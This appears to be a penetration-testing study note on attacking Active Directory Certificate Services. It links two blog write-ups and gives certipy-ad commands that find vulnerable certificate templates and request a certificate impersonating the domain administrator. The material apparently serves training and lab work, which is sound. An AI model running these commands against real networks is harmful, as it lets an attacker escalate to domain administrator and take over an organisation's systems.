// notes/ Active Directory
🏛️

Post Compromise Attacks AD Cs Attacks

{% embed url="<https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/" %}

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_ad-cs-attacks

AD CS Attacks

{% embed url="https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/" %}

{% embed url="https://redfoxsec.com/blog/exploiting-active-directory-certificate-services-ad-cs/" %}

certipy-ad find -u jodie.summers@nara-security.com -p pass -dc-ip 192.168.204.30 -vulnerable -enabled

certipy-ad req -u jodie.summers -p pass -target nara-security.com -ca NARA-CA -template NARAUSER -upn administrator@nara-security.com